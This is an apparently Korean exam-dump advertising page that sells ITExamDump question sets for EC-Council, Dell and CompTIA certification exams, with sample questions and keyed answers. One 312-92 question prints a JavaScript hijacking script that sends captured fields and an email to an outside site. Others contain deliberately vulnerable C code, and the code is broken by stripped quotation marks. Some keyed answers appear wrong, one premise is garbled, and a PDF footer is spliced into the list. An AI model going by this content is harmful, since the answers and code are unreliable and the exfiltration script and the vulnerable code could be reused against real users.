Answer: quantitative

EC-COUNCIL   312-38자료   312-38인증

NO.14 Which of the following is a 16-bit field that identifies the source port number of the application program
in the host that is sending the segment?
A. Sequence Number
B. Header Length
C. Acknowledgment Number
D. Source Port Address
Answer: D

EC-COUNCIL최신덤프   312-38기출문제   312-38

NO.15 CORRECT TEXT
Fill in the blank with the appropriate term. ------------------------------- is the complete network configuration
and information toolkit that uses multi-threaded and multi-connection technologies in order to be very fast
and efficient.
Answer: NetRanger

EC-COUNCIL pdf   312-38   312-38   312-38기출문제   312-38시험문제   312-38

NO.16 Which of the following analyzes network traffic to trace specific transactions and can intercept and log
traffic passing over a digital network? Each correct answer represents a complete solution. Choose all
that apply.
A. Wireless sniffer
B. Spectrum analyzer
C. Protocol analyzer
D. Performance Monitor
Answer: A,C

EC-COUNCIL시험문제   312-38   312-38자격증   312-38 dumps

NO.17 CORRECT TEXT
Fill in the blank with the appropriate term. The _____________is an application layer protocol that is used
between workstations and routers for transporting SNA/NetBIOS traffic over TCP sessions.
Answer: DCAP

EC-COUNCIL덤프   312-38자격증   312-38시험문제

NO.18 John works as a C programmer. He develops the following C program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int buffer(char *str) {
char buffer1[10];
strcpy(buffer1, str);
return 1;
}
int main(int argc, char *argv[]) {
buffer (argv[1]);
printf("Executed\n");
return 1;
}
His program is vulnerable to a __________ attack.
A. SQL injection
B. Denial-of-Service
C. Buffer overflow
D. Cross site scripting
Answer: C

EC-COUNCIL   312-38   312-38최신덤프   312-38 dump

NO.19 Which of the following types of VPN uses the Internet as its main backbone, allowing users, customers,
and branch offices to access corporate network resources across various network architectures?
A. PPTP VPN
B. Remote access VPN
C. Extranet-based VPN
D. Intranet-based VPN
Answer: C

EC-COUNCIL dumps   312-38시험문제   312-38자격증

NO.20 CORRECT TEXT
Fill in the blank with the appropriate term. ______________________ is typically carried out by a remote
attacker attempting to gain information or access to a network on which it is not authorized or allowed.
Answer: Network reconnaissance

EC-COUNCIL   312-38 dumps   312-38 pdf   312-38덤프

ITexamdump의 000-656덤프의 VCE테스트프로그램과 E20-553덤프는 한방에 시험을 패스하도록 도와드립니다. ITexamdump 에서는 최신버전의 70-465시험에 대비한 고품질 덤프와 00M-622시험 최신버전덤프를 제공해드립니다. 최고품질 LOT-951시험자료는 100% 간단하게 시험패스하도록 최선을 다하고 있습니다. IT인증시험패스는 이토록 간단합니다.

시험자료링크: http://www.itexamdump.com/312-38.html

EC-COUNCIL 312-92 덤프자료

인재도 많고 경쟁도 치열한 이 사회에서 IT업계 인재들은 인기가 아주 많습니다.하지만 팽팽한 경쟁률도 무시할 수 없습니다.많은 IT인재들도 어려운 인증시험을 패스하여 자기만의 자리를 지켜야만 합니다.우리 ITExamDump에서는 마침 전문적으로 이러한 IT인사들에게 편리하게 시험을 패스할수 있도록 유용한 자료들을 제공하고 있습니다. EC-COUNCIL 인증312-92인증은 아주 중요한 인증시험중의 하나입니다. ITExamDump의EC-COUNCIL 인증312-92로 시험을 한방에 정복하세요.

그렇게 많은 IT인증덤프공부자료를 제공하는 사이트중ITExamDump의 인지도가 제일 높은 원인은 무엇일가요?그건ITExamDump의 제품이 가장 좋다는 것을 의미합니다. ITExamDump에서 제공해드리는 EC-COUNCIL인증 312-92덤프공부자료는EC-COUNCIL인증 312-92실제시험문제에 초점을 맞추어 시험커버율이 거의 100%입니다. 이 덤프만 공부하시면EC-COUNCIL인증 312-92시험패스에 자신을 느끼게 됩니다.

시험 번호/코드: 312-92
시험 이름: EC-COUNCIL (EC-Council Certified Secure Programmer v2)
당신이 구입하기 전에 시도
일년동안 무료 업데이트
100% 환불보장약속
100% 합격율 보장
Q&A: 99 문항
업데이트: 2013-12-30

현재EC-COUNCIL 312-92인증시험을 위하여 노력하고 있습니까? 빠르게EC-COUNCIL인증 312-92시험자격증을 취득하고 싶으시다면 우리 ITExamDump 의 덤프를 선택하시면 됩니다,. ITExamDump를 선택함으로EC-COUNCIL 312-92인증시험패스는 꿈이 아닌 현실로 다가올 것입니다,

ITExamDump의 도움을 받겠다고 하면 우리는 무조건 최선을 다하여 한번에 패스하도록 도와드릴 것입니다. 또한 일년무료 업뎃서비스를 제공합니다. 중요한 건 덤프가 갱신이 되면 또 갱신버전도 여러분 메일로 보내드립니다. 망설이지 마십시오. 우리를 선택하는 동시에 여러분은312-92시험고민을 하시지 않으셔도 됩니다.빨리 우리덤프를 장바구니에 넣으시죠.

312-92 덤프무료샘플다운로드하기: http://www.itexamdump.com/312-92.html

NO.1 Wayne is a gaming software developer for a large video gaming company in Los Angeles. Wayne has
just completed developing a new action/adventure game for the company that is to be released soon. To
protect the company s copyright on the game, Wayne would like to incorporate a technology that will
restrict the use of the digital files by controlling access, altering, sharing, copying, printing, and saving.
What technology does Wayne want to use?
A. ARM
B. WRM
C. DRM
D. Diffusion
Answer: C

EC-COUNCIL자격증   312-92   312-92기출문제   312-92   312-92

NO.2 What would be the result of the following code?
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
char *input=malloc(20);
char *output=malloc(20);
strcpy(output, normal output );
strcpy(input, argv[1]); printf( input at %p: %s\n , input, input);
printf( output at %p: %s\n , output, output);
printf( \n\n%s\n , output);
}
A. Stack buffer overflow
B. Heap overflow
C. Query string manipulation
D. Pointer Subterfuge
Answer: B

EC-COUNCIL최신덤프   312-92   312-92자료   312-92 pdf

NO.3 Which Linux command will securely delete a file by overwriting its contents?
A. rm rf /
B. Shred
C. ps rm
D. del rm
Answer: B

EC-COUNCIL기출문제   312-92   312-92자격증

NO.4 Fred is planning on using the windows socket application ClientApp.exe program to create a client-side
application that his employees will use. This program will access backend programs from two different
remote sites over WAN connections. If Fred does not make any modifications to the ClientApp.exe default
settings, what port must he have the network engineer open in order for the application to communicate?
A. 21
B. 23
C. 25
D. 80
Answer: D

EC-COUNCIL   312-92자료   312-92

NO.5 Travis, a senior systems developer for YNY Services, received an email recently from an unknown
source. Instead of opening the email on his normal production machine, Travis decides to copy the email
to a thumb drive and examine it from a quarantined PC not on the network. Travis examines the email and
discovers a link that is supposed to take him to http://scarysite.com. Travis decides to get back on his
production computer and examine the code of that site.
From the following code snippet, what has Travis discovered?
<script>
function object() {
this.email setter = captureobject
}
function captureobject(x) {
var objstring =
for(fld in this) {
obstring += fld + :
this[fld] + , ;
}
obstring += email:
+ x;
var req = new XMLHttpRequest();
req.open( GET , http://scarysite.com?obj=
+
escape(objString), true);
req.send(null);
}
</script>
A. URL obfuscation
B. XSS attack
C. JavaScript hijacking
D. URL tampering
Answer: C

EC-COUNCIL자격증   312-92   312-92

NO.6 Processes having the CAP_NET_BIND_SERVICE
can listen on which ports?
A. Any TCP port over 1024
B. Any UDP port under 1024
C. Any TCP port under 1024
D. Any UDP port over 1024
Answer: C

EC-COUNCIL pdf   312-92   312-92   312-92기출문제

NO.7 John is creating a website using ASP. John s web pages will have a number of calculations, so he
decides to create an include file that the pages will call so he does not have to rewrite the formula
numerous times. John s website will be hosted by a server running IIS. John wants to ensure that the
include source code is not revealed when the pages are viewed, so he gives the include an .asp
extension.
When IIS processes the include file, which system file will be used to hide the include source code?
A. ASP.dll
B. Include.dll
C. IISASP.dll
D. IIS.dll
Answer: A

EC-COUNCIL pdf   312-92   312-92 dump   312-92

NO.8 Shayla is designing a web-based application that will pass data to and from a company extranet. This
data is very sensitive and must be protected at all costs. Shayla will use a digital certificate and a digital
signature to protect the data. The digital signature she has chosen to use is based on the difficulty in
computing discrete logarithms. Which digital signature has she chosen?
A. Rabin
B. Diffie-Hellman
C. SA-PSS
D. ElGamal
Answer: D

EC-COUNCIL   312-92 dumps   312-92인증

NO.9 Devon is an applications developer that just got back from a conference on how to correctly write code.
Devon has a number of programs he has written that access data across WAN links, so he is particularly
concerned about their security. Devon writes a script in C++ to check the security of the programs running
on his internal servers. What will the following code from Devon s script accomplish?
#include <iostream>
#include <socket.cpp>
#include <util.h>
using namespace std;
bool tryPort(int p);
string target("");
int main(int argC, char *argV[])
{
printf("PlagueZ port scanner 0.1\n");
int startPort = getInt("start Port: ");
int endPort = getInt("end Port: ");
target = getString("Host: ");
printf("[Processing port %d to %d]\n",
startPort, endPort);
for(int i=0; i<endPort; i++)
{
printf("[Trying port: %d]\n", i);
if(tryPort(i)) // port open
printf("[Port %d is open]\n", i);
}
printf("------Scan Finished-------\n");
system("pause");
return 0;
}
bool tryPort(int p)
{
SocketClient *scan;
try
{
scan = new SocketClient(target, p);
}
catch(int e) { delete &scan; return
false; }
delete &scan;
return true;
}
A. Scan the perimeter firewall for DoS vulnerabilities
B. Create socket connections to the remote sites to check their security
C. Close off any ports used by malicious code
D. Scan for open ports
Answer: D

EC-COUNCIL   312-92   312-92   312-92   312-92자격증

NO.10 What security package is implemented with the following code.?
dwStatus = DsMakSpn
(
ldap ,
MyServer.Mydomain.com ,
NULL,
0,
NULL,
&pcSpnLength,
pszSpn
);
rpcStatus = RpcServerRegisterAuthInfo
(
psz
RPC_C_AUTHN_GSS_NEGOTIATE,
NULL,
NULL
);
A. Diffie-Hellman encryption
B. Repurposing
C. SSPI
D. SMDT
Answer: A

EC-COUNCIL최신덤프   312-92   312-92

NO.11 David is an applications developer working for Dewer and Sons law firm in Los Angeles David just
completed a course on writing secure code and was enlightened by all the intricacies of how code must
be rewritten many times to ensure its security. David decides to go through all the applications he has
written and change them to be more secure. David comes across the following snippet in one of his
programs:
#include <stdio.h>
int main(int argc, char **argv)
{
int number = 5;
printf(argv[1]);
putchar( \n );
printf( number (%p) is equal to %d\n ,
&value, value);
}
What could David change, add, or delete to make this code more secure?
A. Change putchar( \n ) to putchar( %s , \n )
B. Change printf(argv[1]) to printf( %s , argv[1])
C. Change printf(argv[1]) to printf(constv [0])
D. Change int number = 5 to const number =
Answer: B

EC-COUNCIL덤프   312-92시험문제   312-92

NO.12 After learning from an external auditor that his code was susceptible to attack, George decided to
rewrite some of his code to look like the following. What is George preventing by changing the code?
public voif doContent(...) {
...
String s;
if ((s = getUsernameByID( userid )) != null) {
s = StringUtils.encodeToHTML(s, 50);
response.write( <br>Applicant:<u>
+ s +
</u> );
}
...
}
A. Query string manipulation
B. XSS attack
C. Cookie poisoning
D. SQL injection
Answer: B

EC-COUNCIL   312-92시험문제   312-92   312-92   312-92덤프   312-92기출문제

NO.13 Kenny is the CIO for Fredrickson Entertainment, a gaming software company in Omaha. The
developers in Kenny s company have just finished creating a 3D first person shooter game that will be
released to the market within the next couple of months. Kenny is trying to decide what type of license or
activation code structure they should use for the game to prevent piracy and protect their product. Kenny
decides to go with an approach that will allow each sold copy to be activated online up to five times
because he knows his users might have multiple PCs or might need to reinstall the product at some point.
What type of activation policy has Kenny decided to go with?
A. Loose license enforced
reasonable use
B. License terms enforced
fair use
C. Strict license terms enforced
D. Monitor only mode
Answer: A

EC-COUNCIL   312-92최신덤프   312-92최신덤프

NO.14 Harold is programming an application that needs to be incorporate data encryption. Harold decides to
utilize an encryption algorithm that uses 4-bit working registers instead of the usual 2bit working registers.
What encryption algorithm has Harold decided to use?
A. Blowfish
B. RC5
C. RC4
D. RC6
Answer: D

EC-COUNCIL   312-92시험문제   312-92시험문제   312-92 pdf

NO.15 Steve is using the libcap library to create scripts for capturing and analyzing network traffic.
Steve has never used libcap before and is struggling with finding out the correct functions to use. Steve is
trying to pick the default network interface in his script and does not know which function to use. Which
function would he use to correctly choose the default interface in the script?
A. pcap_open_live
B. pcap_int_default
C. pcap_lookupdev
D. pcap_use_int
Answer: C

EC-COUNCIL   312-92   312-92 dump   312-92자격증

ITexamdump의 70-688덤프의 VCE테스트프로그램과 642-467덤프는 한방에 시험을 패스하도록 도와드립니다. ITexamdump 에서는 최신버전의 C_TSCM62_65시험에 대비한 고품질 덤프와 LOT-441시험 최신버전덤프를 제공해드립니다. 최고품질 1Y0-200시험자료는 100% 간단하게 시험패스하도록 최선을 다하고 있습니다. IT인증시험패스는 이토록 간단합니다.

시험자료링크: http://www.itexamdump.com/312-92.html

도비 Dell DC0-261 시험

ITExamDump 에서는 최선을 다해 여러분이Dell DC0-261인증시험을 패스하도록 도울 것이며 여러분은 ITExamDump에서Dell DC0-261덤프의 일부분의 문제와 답을 무료로 다운받으실 수 잇습니다. ITExamDump 선택함으로Dell DC0-261인증시험통과는 물론ITExamDump 제공하는 일년무료 업데이트서비스를 제공받을 수 있으며 ITExamDump의 인증덤프로 시험에서 떨어졌다면 100% 덤프비용 전액환불을 약속 드립니다.

지금 사회에 능력자들은 아주 많습니다.it인재들도 더욱더 많아지고 있습니다.많은 it인사들은 모두 관연 it인증시험에 참가하여 자격증취득을 합니다.자기만의 자리를 확실히 지키고 더 높은 자리에 오르자면 필요한 스펙이니까요.DC0-261시험은Dell인증의 중요한 시험이고 또 많은 it인사들은Dell자격증을 취득하려고 노력하고 있습니다.

ITExamDump의 덤프선택으로Dell DC0-261인증시험에 응시한다는 것 즉 성공과 멀지 않았습니다. 여러분의 성공을 빕니다.

시험 번호/코드: DC0-261
시험 이름: Dell (Dell Storage Networking Professional Exam - Version 2)
당신이 구입하기 전에 시도
일년동안 무료 업데이트
100% 환불보장약속
100% 합격율 보장
Q&A: 124 문항
업데이트: 2013-12-30

많은 분들이 고난의도인 IT관련인증시험을 응시하고 싶어 하는데 이런 시험은 많은 전문적인 IT관련지식이 필요합니다. 시험은 당연히 완전히 전문적인 IT관련지식을 터득하자만이 패스할 가능성이 높습니다. 하지만 지금은 많은 방법들로 여러분의 부족한 면을 보충해드릴 수 있으며 또 힘든 IT시험도 패스하실 수 있습니다. 혹은 여러분은 전문적인 IT관련지식을 터득하자들보다 더 간단히 더 빨리 시험을 패스하실 수 있습니다.

네트워크 전성기에 있는 지금 인터넷에서Dell 인증DC0-261시험자료를 많이 검색할수 있습니다. 하지만 왜ITExamDump덤프자료만을 믿어야 할가요? ITExamDump덤프자료는 실제시험문제의 모든 유형에 근거하여 예상문제를 묶어둔 문제은행입니다.시험적중율이 거의 100%에 달하여Dell 인증DC0-261시험을 한방에 통과하도록 도와드립니다.

수많은Dell인증 DC0-261시험공부자료중에서ITExamDump의Dell인증 DC0-261덤프가 가장 출중한 원인은 무엇일가요? ITExamDump의Dell인증 DC0-261덤프는 실제시험문제의 출제방향을 연구하여 IT전문가로 되어있는 덤프제작팀이 만든 최신버전 덤프입니다. ITExamDump의Dell인증 DC0-261덤프가 있으면 힘든Dell인증 DC0-261시험이 쉬어져서 자격증을 제일 빠른 시간내에 취득할수 있습니다.제일 어려운 시험을 제일 간단한 방법으로 패스하는 방법은ITExamDump의Dell인증 DC0-261덤프로 시험준비 공부를 하는것입니다.

DC0-261 덤프무료샘플다운로드하기: http://www.itexamdump.com/DC0-261.html

NO.1 What steps should you perform to create a copy of a source LUN in a second storage array, while
minimizing unavailability of the source LUN?
A. use SAN Copy to copy the source LUN, then take a snapshot on the second storage array
B. take a snapshot of the source LUN, then use SAN Copy to copy the snapshot to the second storage
array
C. take a snapshot of the source LUN, then use SAN Copy to copy the source LUN to the second storage
array
D. take a snapshot of the source LUN, run MirrorView to mirror the snapshot to the second array, then
use SAN Copy to synchronize the mirror with the source LUN
Answer: B

Dell   DC0-261   DC0-261

NO.2 Which three operations are possible using clones? (Choose three.)
A. Up to eight clones can be made from a single source LUN.
B. While a clone is fractured, it can be connected to a host for use.
C. A fractured clone can be accessed for read and write operations.
D. A snapshot of a clone must be reverse synchronized prior to mounting.
E. A live clone can be mounted by a secondary host to use as a standard LUN.
Answer: ABC

Dell   DC0-261   DC0-261기출문제   DC0-261자격증

NO.3 Which two tasks can Navisphere Analyzer perform? (Choose two.)
A. comparing archived and real-time performance data
B. tracking performance trends for Dell / EMC switches
C. tracking performance trends for Dell / EMC storage arrays
D. tracking performance trends for hosts connected to Dell / EMC Storage Area Networks (SANs)
Answer: AC

Dell   DC0-261기출문제   DC0-261최신덤프

NO.4 Which three statements are correct about SAN Copy? (Choose three.)
A. SAN Copy can be installed on any model CX array.
B. SAN Copy is a storage array-based Data Mover application.
C. SAN Copy transfers data over a Fibre Channel SAN, as opposed to an IP LAN.
D. SAN Copy sessions can be managed either by Navisphere Manager or by CLI.
Answer: BCD

Dell최신덤프   DC0-261   DC0-261 dumps   DC0-261   DC0-261 dumps

NO.5 Which three statements are correct about using SnapView? (Choose three.)
A. Snapshots can take mere seconds to create.
B. Snapshots may be created using the admhost CLI utility.
C. SnapView can take snapshots, or point-in-time copies of LUNs.
D. SnapView can make clones, or 100% duplicate copies of a LUN.
E. Snapshots are volume-level and thus able to restore specific files.
Answer: ACD

Dell dump   DC0-261덤프   DC0-261인증

NO.6 Which two are examples of how SnapView can be used in conjunction with MirrorView? (Choose two.)
A. SnapView can be used to take a snapshot of the remote mirror for use at the remote site.
B. SnapView can be used to take a snapshot of the remote mirror and then back up the snapshot to tape.
C. SnapView can be used to take a snapshot of the primary mirror and then mirror the snapshot to the
remote site.
D. SnapView can be used to take a snapshot of the remote mirror and then clone the snapshot for use at
the primary site.
Answer: AB

Dell   DC0-261자료   DC0-261

NO.7 You want User1 to have Administrator access to storage system A that is located in a branch office.
However, you want User1 to have read-only access to the remaining storage systems within the domain.
Which scenario best accomplishes this task?
A. User accounts must be either global or local because the user inherits the most restrictive role
assigned to the user.
B. Create a local account with Administrator access on storage system A, then create a global account for
User1 with Monitor access.
C. Create a global account with Monitor access on storage system A, then modify the account policy to
allow User1 to administer only storage system A.
D. Create a global account with Monitor access on the master node, then have User1 log in to storage
system A using the local default manager account.
Answer: B

Dell   DC0-261최신덤프   DC0-261시험문제   DC0-261   DC0-261 dumps

NO.8 You are connecting a CX700 to a CX500 through a fabric for Mirrorview. Which two zones must be
completed? (Choose two.)
A. Port 1 on SPA of the CX700 must be zoned so that it can communicate with port 1 on SPA of the
CX500.
B. Port 1 on SPB of the CX700 must be zoned so that it can communicate with port 1 on SPB of the
CX500.
C. Port 3 on SPA of the CX700 must be zoned so that it can communicate with port 1 on SPA of the
CX500.
D. Port 3 on SPB of the CX700 must be zoned so that it can communicate with port 1 on SPB of the
CX500.
Answer: CD

Dell   DC0-261자료   DC0-261시험문제   DC0-261덤프

NO.9 Which three statements are correct about clones? (Choose three.)
A. Clones can be copied using SAN Copy to a remote storage array.
B. Clones typically consume about 20% of the size of the source LUN.
C. Fractured clones can later be synchronized with the source LUN to update the contents.
D. Clones can be fractured from the source LUN, then mounted to a secondary host and accessed just
like another LUN.
Answer: ACD

Dell dump   DC0-261최신덤프   DC0-261   DC0-261인증

NO.10 Which utility should you use to add LUN management functionality to a server when using SAN Copy?
A. naviadm
B. admhost
C. admcopy
D. admsnap
Answer: B

Dell   DC0-261   DC0-261시험문제   DC0-261 dumps

NO.11 Which two states can a clone LUN be in before it can be fractured? (Choose two.)
A. consistent
B. synchronizing
C. synchronized
D. reverse out-of-sync
Answer: AC

Dell   DC0-261덤프   DC0-261덤프   DC0-261 pdf   DC0-261자료

NO.12 SAN Copy sessions offer which three capabilities? (Choose three.)
A. providing content push or pull capability
B. offloading Storage Array processing onto hosts
C. migrating data from older arrays to newer arrays in the same SAN fabric
D. distributing and collecting content between the central location and branch offices
Answer: ACD

Dell   DC0-261   DC0-261자료   DC0-261최신덤프

NO.13 Which four LUN characteristics can be displayed in Navisphere Analyzer? (Choose four.)
A. Bytes Tx / Rx
B. Utilization (%)
C. Capacity (GB)
D. Response Time (ms)
E. Total Bandwidth (MB/sec.)
F. Total Throughput (I/O /sec.)
Answer: BDEF

Dell자격증   DC0-261   DC0-261기출문제   DC0-261   DC0-261 dump

NO.14 You have a source LUN on a CX500 for which you maintain snapshots for tape backup. You need to
create a new snapshot for this source LUN but are unable to do so. You can create snapshots of other
source LUNs on the array. What is the most likely problem?
A. You have reached the maximum limit of 50 Cache LUNs.
B. You have reached the maximum limit of 8 snapshots per source LUN.
C. You have reached the maximum limit of 150 snapshots per storage system.
D. You have reached the maximum limit of 300 snapshots per storage system.
Answer: B

Dell   DC0-261자격증   DC0-261

NO.15 Which statement best describes bi-directional mirroring as implemented by MirrorView ?
A. By utilizing two storage systems, a single storage system can be configured as the primary for one
mirror and a secondary for another mirror.
B. By utilizing two storage systems and one tape drive, the two storage systems are configured as a
primary and the secondary is backed up to tape.
C. By utilizing two storage systems, a single storage system is configured as the primary and the other
storage system is configured as the secondary.
D. By utilizing three storage systems, the two storage systems are configured as a primary and the third
storage system is configured as a secondary that is used to store the primary images.
Answer: A

Dell   DC0-261   DC0-261   DC0-261   DC0-261

NO.16 You have installed SAN Copy. Which statement is true?
A. The storage array must be rebooted.
B. SAN Copy cannot be upgraded, except by a complete re-install.
C. Any LUN within the SAN is automatically made available to be copied.
D. The admhost utility must be installed on each storage array that Navisphere Manager resides on.
E. SAN Copy sessions can be managed through the Navisphere Manager Enterprise Storage window.
Answer: E

Dell dumps   DC0-261자료   DC0-261 dump

NO.17 How many LUNs are required for the Clone Private LUN?
A. one per SP
B. one per clone
C. one per clone group
D. one per storage system
Answer: A

Dell   DC0-261자료   DC0-261   DC0-261   DC0-261최신덤프

NO.18 You want to implement site level disaster recovery. Which two are valid options to consider? (Choose
two.)
A. Use SAN Copy to copy LUNs from the primary site to the recovery site.
B. Use SAN Copy to mirror a LUN from the primary site to the recovery site.
C. Use MirrorView to mirror LUNs from the primary site to another local array.
D. Use SnapView to create a clone, then use SAN Copy to copy the clone to the recovery site.
Answer: AD

Dell자료   DC0-261덤프   DC0-261인증   DC0-261

NO.19 You are concerned that the loss of an SP might cause you to lose all of your existing snapshot
sessions. What should you do to prevent losing existing snapshot sessions?
A. add a UPS to the storage array
B. use PowerPath to gain failover support
C. select the Persistent mode when starting a snapshot session
D. Nothing, the Vaulting process automatically saves all snapshots to disk in the PSM LUN.
Answer: C

Dell   DC0-261최신덤프   DC0-261기출문제

NO.20 How are the LUNs for the Write Intent Log (WIL) configured?
A. WIL LUNs are configured automatically.
B. After manually binding the LUNs, the WIL is automatically configured.
C. WIL LUNs must be manually bound and allocated on a per-array basis.
D. WIL LUNs must be manually bound and allocated on one array. The WIL is then automatically
replicated to the other array.
Answer: C

Dell   DC0-261   DC0-261자격증   DC0-261 pdf

ITexamdump의 350-029덤프의 VCE테스트프로그램과 000-820덤프는 한방에 시험을 패스하도록 도와드립니다. ITexamdump 에서는 최신버전의 000-959시험에 대비한 고품질 덤프와 70-332시험 최신버전덤프를 제공해드립니다. 최고품질 IIA-CGAP시험자료는 100% 간단하게 시험패스하도록 최선을 다하고 있습니다. IT인증시험패스는 이토록 간단합니다.

시험자료링크: http://www.itexamdump.com/DC0-261.html

CompTIA 인증한 225-030 덤프

CompTIA인증225-030시험을 패스하여 자격증을 취득한다면 여러분의 미래에 많은 도움이 될 것입니다.CompTIA인증225-030시험자격증은 it업계에서도 아주 인지도가 높고 또한 알아주는 시험이며 자격증 하나로도 취직은 문제없다고 볼만큼 가치가 있는 자격증이죠.CompTIA인증225-030시험은 여러분이 it지식테스트시험입니다.

CompTIA인증 225-030시험준비중이신 분들은CompTIA인증 225-030시험통과가 많이 어렵다는것을 알고 있을것입니다. 학교공부하랴,회사다니랴 자격증공부까지 하려면 너무 많은 정력과 시간이 필요할것입니다. 그렇다고 자격증공부를 포기하면 자신의 위치를 찾기가 힘들것입니다. ITExamDump 덤프는 IT인증시험을 대비하여 제작된것이므로 시험적중율이 높아 다른 시험대비공부자료보다 많이 유용하기에 IT자격증을 취득하는데 좋은 동반자가 되어드릴수 있습니다. ITExamDump 덤프를 사용해보신 분들의 시험성적을 통계한 결과 시험통과율이 거의 100%에 가깝다는 놀라운 결과를 얻었습니다.

시험 번호/코드: 225-030
시험 이름: CompTIA (CDIA+ Certification)
당신이 구입하기 전에 시도
일년동안 무료 업데이트
100% 환불보장약속
100% 합격율 보장
Q&A: 170 문항
업데이트: 2013-12-30

CompTIA 225-030인증시험패스에는 많은 방법이 있습니다. 먼저 많은 시간을 투자하고 신경을 써서 전문적으로 과련 지식을 터득한다거나; 아니면 적은 시간투자와 적은 돈을 들여 ITExamDump의 인증시험덤프를 구매하는 방법 등이 있습니다.

CompTIA 225-030인증시험을 어떻게 준비하면 될가 아직도 고민하고 계시죠? 학원에 등록하자니 시간도 없고 돈도 많이 들고 쉽게 엄두가 나지 않는거죠? ITExamDump제품을 구매하신다면 그런 부담을 이제 끝입니다. ITExamDump덤프는 더욱 가까지 여러분들께 다가가기 위하여 그 어느 덤프판매 사이트보다 더욱 저렴한 가격으로 여러분들을 맞이하고 있습니다. CompTIA 225-030덤프는ITExamDump제품이 최고랍니다.

CompTIA 225-030인증시험은 전문적인 관련지식을 테스트하는 인증시험입니다. ITExamDump는 여러분이CompTIA 225-030인증시험을 통과할 수 잇도록 도와주는 사이트입니다. 여러분은 응시 전 저희의 문제와 답만 잘 장악한다면 빠른 시일 내에 많은 성과 가 있을 것입니다.

아무런 노력을 하지 않고 승진이나 연봉인상을 꿈꾸고 있는 분이라면 이 글을 검색해낼수 없었을것입니다. 승진이나 연봉인상을 꿈꾸면 승진과 연봉인상을 시켜주는 회사에 능력을 과시해야 합니다. IT인증시험은 국제적으로 승인해주는 자격증을 취득하는 시험입니다. ITExamDump의CompTIA인증 225-030덤프의 도움으로 CompTIA인증 225-030시험을 패스하여 자격증을 취득하면 승진이나 연봉인상의 꿈이 이루어집니다. 결코 꿈은 이루어질것입니다.

많은 사이트에서도 무료CompTIA 225-030덤프데모를 제공합니다. 우리도 마찬가지입니다. 여러분은 그러한CompTIA 225-030데모들을 보시고 다시 우리의 덤프와 비교하시면, 우리의 덤프는 다른 사이트덤프와 차원이 다른 덤프임을 아사될 것 입니다. 우리 ITExamDump사이트에서 제공되는CompTIA인증225-030시험덤프의 일부분인 데모 즉 문제와 답을 다운받으셔서 체험해보면 우리ITExamDump에 믿음이 갈 것입니다. 왜냐면 우리 ITExamDump에는 베터랑의 전문가들로 이루어진 연구팀이 잇습니다, 그들은 it지식과 풍부한 경험으로 여러 가지 여러분이CompTIA인증225-030시험을 패스할 수 있을 자료 등을 만들었습니다 여러분이CompTIA인증225-030시험에 많은 도움이CompTIA 225-030될 것입니다. ITExamDump 가 제공하는225-030테스트버전과 문제집은 모두CompTIA 225-030인증시험에 대하여 충분한 연구 끝에 만든 것이기에 무조건 한번에CompTIA 225-030시험을 패스하실 수 있습니다. 때문에CompTIA 225-030덤프의 인기는 당연히 짱 입니다.

225-030 덤프무료샘플다운로드하기: http://www.itexamdump.com/225-030.html

NO.1 A customer is performing incremental backups nightly. At the end of the month they review a list of
documents that have reached their end of life and determine if they can be destroyed. Which of the
following BEST describes the records storage management process?
A. The customer does not have a records management process.
B. The customer has an informal records management process.
C. The customer has a formal records storage management process.
D. The customer has a document capture process.
Answer: C

CompTIA   225-030자료   225-030자격증   225-030 dumps

NO.2 A client wishes to establish a Document Management System (DMS) for handling a large volume of
standard documents to be scanned. The client wants to enable search capabilities for certain information
on the documents. Which of the following is the MOST appropriate solution?
A. Form recognition and entire document search
B. Form recognition and index search
C. Zonal OCR and entire document search
D. Zonal OCR and index search
Answer: D

CompTIA최신덤프   225-030시험문제   225-030   225-030   225-030자료   225-030자격증

NO.3 A business requires its employees to have access to internal documents via the Internet. Which of the
following technologies will allow access to those documents and maintain security of the connection?
A. Checksumming
B. Public Key Infrastructure (PKI)
C. Watermarking
D. Virtual Private Network (VPN)
Answer: D

CompTIA시험문제   225-030   225-030최신덤프   225-030기출문제

NO.4 A local library keeps many important documents relating to the historical landmarks in town. The
documents consist of blueprints, photographs, and newspaper articles. The library wants to capture the
documents electronically so they can be viewed online. The first concern of the person capturing the
documents would be the:
A. color of the documents.
B. age and physical condition of the documents.
C. volume of the documents on file.
D. number of file cabinets.
Answer: B

CompTIA자격증   225-030   225-030

NO.5 A company would like to scan documents for disaster recovery purposes. Which system would be most
appropriate?
A. Knowledge Management System (KMS)
B. Image Management System (IMS)
C. Electronic Document Management System (EDMS)
D. Storage Area Network (SAN)
Answer: B

CompTIA   225-030자료   225-030   225-030자격증

NO.6 A member of the implementation team discovers that the software vendor is issuing a new version.
Which one of the following should be done?
A. Upgrade after the project completion date
B. Research the new product to understand its features
C. Inform the business sponsors
D. Notify the Project Manager
Answer: D

CompTIA덤프   225-030자료   225-030 pdf   225-030자료

NO.7 Many of the documents to be scanned by a customer are sales invoices with a yellow background. A
feature of the proposed scanning solution should include:
A. image enhancement.
B. deskew.
C. color dropout.
D. color enhancement.
Answer: C

CompTIA   225-030   225-030 dump

NO.8 All of the following are routing features of production workflow EXCEPT:
A. work monitoring.
B. support for multiple queues based on work type.
C. sorting queues in date order.
D. pending or holding items.
Answer:A

CompTIA기출문제   225-030   225-030   225-030   225-030자격증   225-030

NO.9 Which of the following are elements of a communication plan?
A. Ethernet and TCP / IP
B. Project charter and project plan
C. E-mail and FTP
D. All-hands meetings and intranet postings
Answer: D

CompTIA자격증   225-030   225-030덤프

NO.10 The proposed project plan requires that documents must have a file plan and track all access
attempts. What MUST be part of this solution?
A. A records management system
B. A storage management system
C. A scan subsystem
D. Annotation and redaction capabilities
Answer:A

CompTIA최신덤프   225-030   225-030   225-030   225-030
This document was created with Win2PDF available at http://www.win2pdf.com.
The unregistered version of Win2PDF is for evaluation or non-commercial use only.
This page will not be added after purchasing Win2PDF.

NO.11 All of the following are inputs to project schedule development EXCEPT:
A. change requests.
B. lead- and lag-times.
C. resource requirements.
D. resource availability.
Answer:A

CompTIA기출문제   225-030기출문제   225-030기출문제

NO.12 What is a disadvantage of scanning all images at the highest resolution possible?
A. Higher expense
B. Lower quality
C. Small file size
D. Compatibility issues
Answer:A

CompTIA dumps   225-030   225-030덤프   225-030시험문제   225-030 dump

NO.13 The Human Resources department receives applications: 10% by fax, 30% by e-mail, and 60% by mail.
All applications are two-sided forms. Applications received by mail must be scanned into the Document
